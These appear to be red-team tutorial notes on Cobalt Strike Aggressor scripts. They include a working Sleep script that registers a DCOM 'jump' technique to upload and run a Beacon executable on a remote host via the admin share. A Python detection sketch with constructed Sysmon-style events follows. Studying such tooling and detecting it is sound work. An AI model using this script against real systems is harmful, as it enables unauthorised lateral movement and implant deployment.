Aggressor Scripts

The ".cna" files that we load into the Cobalt Strike Script Manager are called Aggressor Scripts. These can override default behaviours in Cobalt Strike to customise the UI (add new menus, commands, etc.) and extend the data models.

The Aggressor script reference is public and available at helpsystems.com. The underlying programming language used is called Sleep (http://sleep.dashnine.org/manual/index.html).

Aggressor can be used to register new techniques under jump and remote-exec using beacon_remote_exploit_register (https://hstechdocs.helpsystems.com/manuals/cobaltstrike/current/userguide/content/topics_aggressor-scripts/as-resources_functions.htm#beacon_remote_exploit_register) and beacon_remote_exec_method_register (https://hstechdocs.helpsystems.com/manuals/cobaltstrike/current/userguide/content/topics_aggressor-scripts/as-resources_functions.htm#beacon_remote_exec_method_register) respectively.

Example that integrates Invoke-DCOM.ps1 into jump:

sub invoke_dcom
{
    local('$handle $script $oneliner $payload');

    # acknowledge this command
    btask($1, "Tasked Beacon to run " . listener_describe($3) . " on $2 via DCOM", "T1021");

    # read in the script
    $handle = openf(getFileProper("C:\\Tools", "Invoke-DCOM.ps1"));
    $script = readb($handle, -1);
    closef($handle);

    # host the script in Beacon
    $oneliner = beacon_host_script($1, $script);

    # generate stageless payload
    $payload = artifact_payload($3, "exe", "x64");

    # upload to the target
    bupload_raw($1, "\\\\ $+ $2 $+ \\C$\\Windows\\Temp\\beacon.exe", $payload);

    # run via powerpick
    bpowerpick!($1, "Invoke-DCOM -ComputerName  $+  $2  $+  -Method MMC20.Application -Command C:\\Windows\\Temp\\beacon.exe", $oneliner);

    # link if p2p beacon
    beacon_link($1, $2, $3);
}

beacon_remote_exploit_register("dcom", "x64", "Use DCOM to run a Beacon payload", &invoke_dcom);

local defines variables that are local to the current function, so they disappear once the function has finished executing. Sleep can have global, closure-specific and local scopes.

$1 is the Beacon ID.

$2 is the target to jump to.

$3 is the selected listener.

The $script variable holds the raw content of Invoke-DCOM.ps1. If you want to see the content of these variables, you can use println($oneliner); and they'll appear in the Script Console (Cobalt Strike > Script Console).

$+ concatenates values inside an interpolated string and requires whitespace on each side of it.
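
On the target, the jump technique above leaves a recognisable trail: an executable written to C:\Windows\Temp over the admin share, then a child process of mmc.exe started as a COM server (-Embedding). The following detection sketch is an added example, not part of the original notes or of Cobalt Strike; the event field names and sample events are constructed, Sysmon-style assumptions.

```python
from datetime import datetime, timedelta

# Constructed Sysmon-style events (eid 11 = FileCreate, eid 1 = ProcessCreate).
# Field names are assumptions for this example, not a real log schema.
MMC = r"C:\Windows\System32\mmc.exe"
EVENTS = [
    {"eid": 11, "time": "2024-01-01T10:00:00", "host": "srv-1",
     "image": "System", "target": r"C:\Windows\Temp\beacon.exe"},
    {"eid": 1, "time": "2024-01-01T10:00:05", "host": "srv-1",
     "image": r"C:\Windows\Temp\beacon.exe",
     "parent_image": MMC, "parent_cmdline": MMC + " -Embedding"},
    {"eid": 1, "time": "2024-01-01T10:30:00", "host": "srv-2",
     "image": r"C:\Windows\System32\cmd.exe",
     "parent_image": MMC, "parent_cmdline": MMC + " -Embedding"},
    # Interactive console use: mmc.exe started with a snap-in, not as a COM server.
    {"eid": 1, "time": "2024-01-01T11:00:00", "host": "wks-7",
     "image": r"C:\Windows\System32\cmd.exe",
     "parent_image": MMC, "parent_cmdline": MMC + r" C:\Windows\System32\compmgmt.msc"},
]

def is_dcom_mmc_child(ev):
    """ProcessCreate whose parent is mmc.exe launched via DCOM (-Embedding)."""
    return (ev["eid"] == 1
            and ev["parent_image"].lower().endswith("\\mmc.exe")
            and "-embedding" in ev["parent_cmdline"].lower())

def detect(events, window=timedelta(minutes=5)):
    """Flag mmc.exe -Embedding children; escalate when the child binary was
    written by the System process (remote SMB write) shortly before it ran."""
    drops = {}      # (host, lowercased path) -> time of last write by System
    findings = []
    for ev in sorted(events, key=lambda e: e["time"]):
        ts = datetime.fromisoformat(ev["time"])
        if ev["eid"] == 11 and ev["image"] == "System":
            drops[(ev["host"], ev["target"].lower())] = ts
        elif is_dcom_mmc_child(ev):
            dropped = drops.get((ev["host"], ev["image"].lower()))
            recent = dropped is not None and ts - dropped <= window
            findings.append({"host": ev["host"], "image": ev["image"],
                             "severity": "high" if recent else "medium"})
    return findings

if __name__ == "__main__":
    for finding in detect(EVENTS):
        print(finding)
```
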
